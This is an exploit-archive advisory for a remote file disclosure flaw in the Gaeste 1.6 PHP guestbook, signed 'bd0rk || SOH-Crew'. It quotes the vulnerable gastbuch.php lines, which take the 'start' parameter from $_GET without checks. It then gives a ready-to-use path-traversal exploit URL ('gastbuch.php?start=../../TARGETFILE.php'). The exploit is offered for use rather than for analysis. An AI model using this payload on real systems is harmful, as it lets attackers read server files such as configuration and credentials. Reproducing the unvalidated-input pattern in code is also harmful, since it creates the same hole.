id: 4829
date: 02/09/2009
title: Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability
author: bd0rk
cves: 

==============================================================
Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability
==============================================================


               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
               +                                                                +
               + Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
               +                                                                +
               +                     bd0rk || SOH-Crew                          +
               +                                                                +
               ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



=> Vendor: http://www.php4scripte.de/

=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip

=> Bugfound3R: bd0rk

=> Vulnerable Code in gastbuch.php line 2-3

        -------------------------------
                              
           if (isset($_GET['start'])) {
           $start=$_GET['start'];

        -------------------------------


[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php




#  0day.today [2023-03-24]  #